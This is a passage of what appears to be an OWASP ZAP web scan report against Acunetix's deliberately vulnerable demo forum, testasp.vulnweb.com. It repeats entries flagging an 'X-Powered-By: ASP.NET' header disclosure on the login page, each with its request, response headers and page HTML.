align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
